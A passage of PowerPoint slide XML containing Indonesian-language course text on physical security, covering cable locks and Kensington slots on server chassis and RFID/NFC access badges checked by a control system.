              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipasang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilengkapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> loop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>logam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan slot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Kensington. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>posisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melepas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dahulu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Lencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Akses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Lencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Kartu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>plastik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disematkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> strip </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>magnetik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, chip </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>frekuensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> radio (RFID), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dekat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (NFC) yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berwenang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontraktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengunjung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengganti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Lencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggantikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>namun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicapai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengharuskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digesek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didekatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembaca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pintu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pintu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>putar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pembaca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkomunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keaslian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemegang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengenali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> valid dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diotorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> area </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pintu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicatat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
